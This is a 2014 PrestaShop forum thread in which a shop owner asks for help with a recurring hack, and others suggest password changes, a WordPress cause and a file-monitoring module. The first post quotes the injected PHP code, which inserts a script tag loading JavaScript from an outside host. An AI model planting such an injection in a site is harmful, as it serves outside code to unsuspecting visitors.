luckysengoku Posted July 14, 2014 Share Posted July 14, 2014 hi all, im using PS version 1.3.7.. recently my site is like being hacked, they inserted a script like below : <?php#ae0524#if(empty($m)) {$m = "<script type=\"text/javascript\" src=\"http://dmi.inf.br/zrp7wk3z.php?id=$frameid\"></script>";echo $m;}#/ae0524#?> has anybody ever experienced it? and how to prevent it? thx for any help Link to comment Share on other sites More sharing options...
Dh42 Posted July 14, 2014 Share Posted July 14, 2014 Change all of your passwords, that is most likely the way that your site was compromised. Link to comment Share on other sites More sharing options...
vekia Posted July 14, 2014 Share Posted July 14, 2014 do you use some other cms on the same hosting account? for example wordpress / joomla ? Link to comment Share on other sites More sharing options...
luckysengoku Posted July 14, 2014 Author Share Posted July 14, 2014 yeah i use a wordpress for blog but its on another sub folder... i already changed the password for BO and FTP, but it still been injected with the script. it's the second time, the web got attacked. Link to comment Share on other sites More sharing options...
vekia Posted July 14, 2014 Share Posted July 14, 2014 it doesnt matter that it's in different subfolder i bet that this malware is related to wordpress. prestashop is secured, but wordpress not Link to comment Share on other sites More sharing options...
El Patron Posted July 14, 2014 Share Posted July 14, 2014 sorry you have this issue, after you have resolved the code injection, this module detects file changes and emails shop owner so you can review unauthorized changes, and if need be, restore the file quickly. http://www.prestashop.com/forums/topic/303132-module-prestavault-malware-trojan-virus-protection/ Link to comment Share on other sites More sharing options...
luckysengoku Posted July 17, 2014 Author Share Posted July 17, 2014 yeah, thanks a lot for the solution and explanation. i try to update my WP and see if this problem will come again. Link to comment Share on other sites More sharing options...
luckysengoku Posted July 17, 2014 Author Share Posted July 17, 2014 i'm still using PS v1.3 so i think the module will not work for me Link to comment Share on other sites More sharing options...
Recommended Posts